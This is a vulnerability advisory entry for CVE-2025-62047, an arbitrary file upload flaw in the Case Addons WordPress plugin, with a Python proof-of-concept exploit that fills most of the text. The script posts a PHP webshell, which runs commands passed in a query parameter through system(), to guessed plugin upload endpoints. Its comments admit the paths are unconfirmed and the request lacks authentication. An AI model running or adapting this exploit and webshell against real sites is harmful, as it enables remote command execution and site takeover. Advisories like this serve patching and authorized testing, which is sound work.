Unrestricted Upload of File with Dangerous Type (CWE-434) vulnerability in Case-Themes Case Addons (case-addons). This issue affects Case Addons: all versions prior to 1.3.0 (from n/a through < 1.3.0).
CVSS Details
CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
Case Addons plugin < 1.3.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
# CVE-2025-62047 PoC - WordPress Case Addons Plugin Arbitrary File Upload
# Target: WordPress site with vulnerable Case Addons plugin (< 1.3.0)

# Placeholder base URL that the candidate endpoint list below is built from.
TARGET_URL = "http://target-wordpress-site.com"

# Candidate upload handlers for the plugin, resolved against TARGET_URL.
# NOTE(review): these paths are educated guesses, not confirmed against the
# plugin source -- the first one is the generic WordPress AJAX router.
_UPLOAD_PATHS = (
    "/wp-admin/admin-ajax.php",
    "/wp-content/plugins/case-addons/includes/upload.php",
    "/wp-content/plugins/case-addons/ajax/upload.php",
)
UPLOAD_URLS = [TARGET_URL + path for path in _UPLOAD_PATHS]

# Minimal PHP webshell: passes the ?cmd= query parameter to system().
WEBSHELL = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
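def exploit(target_url):
    """
    Try to upload a PHP file to the candidate Case Addons upload endpoints.

    Case Addons < 1.3.0 fails to properly validate uploaded file types
    (CWE-434). The candidate endpoints are derived from ``target_url`` --
    the original version of this function ignored its argument and always
    hit the hard-coded TARGET_URL, so ``python cve-2025-62047.py <url>``
    never actually targeted ``<url>``.

    Args:
        target_url: Base URL of the WordPress site, e.g. ``https://host``.
            A trailing slash is tolerated.

    Returns:
        True after the first endpoint that answers HTTP 200, else False.
        NOTE(review): a 200 is only a weak signal. The response body is not
        checked for a stored path, and a generic router such as
        admin-ajax.php may answer 200 to requests it did nothing with.
        Confirm the upload out-of-band before reporting it as exploitable.
    """
    base = target_url.rstrip("/")
    # Endpoint paths are guesses at where the plugin handles uploads.
    # The CVSS vector for this CVE is PR:L, i.e. the bug is reachable by a
    # low-privileged *authenticated* user; this request carries no session
    # cookie or nonce, and the admin-ajax route is called without an
    # ``action`` parameter, so against a patched or unauthenticated target
    # every attempt is expected to fail.
    candidate_paths = (
        "/wp-admin/admin-ajax.php",
        "/wp-content/plugins/case-addons/includes/upload.php",
        "/wp-content/plugins/case-addons/ajax/upload.php",
    )
    files = {"file": ("shell.php", WEBSHELL, "application/x-php")}
    for path in candidate_paths:
        upload_url = f"{base}{path}"
        try:
            response = requests.post(upload_url, files=files, timeout=10)
        except requests.exceptions.RequestException as e:
            # Network-level failure (DNS, connect, timeout): try the next path.
            print(f"[-] Failed to upload to {upload_url}: {e}")
            continue
        if response.status_code == 200:
            print(f"[+] Potential upload successful at: {upload_url}")
            print(f"[+] Response: {response.text}")
            return True
    return False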
def main():
    """Read the target URL from argv[1] and run the PoC against it.

    Prints a usage line and exits with status 1 when no URL is given.
    """
    if len(sys.argv) <= 1:
        print("Usage: python cve-2025-62047.py <target-url>")
        sys.exit(1)
    target = sys.argv[1]
    print(f"[*] Starting exploitation of CVE-2025-62047 against {target}")
    exploit(target)
# Script entry point; nothing runs when this module is merely imported.
if __name__ == "__main__":
    main()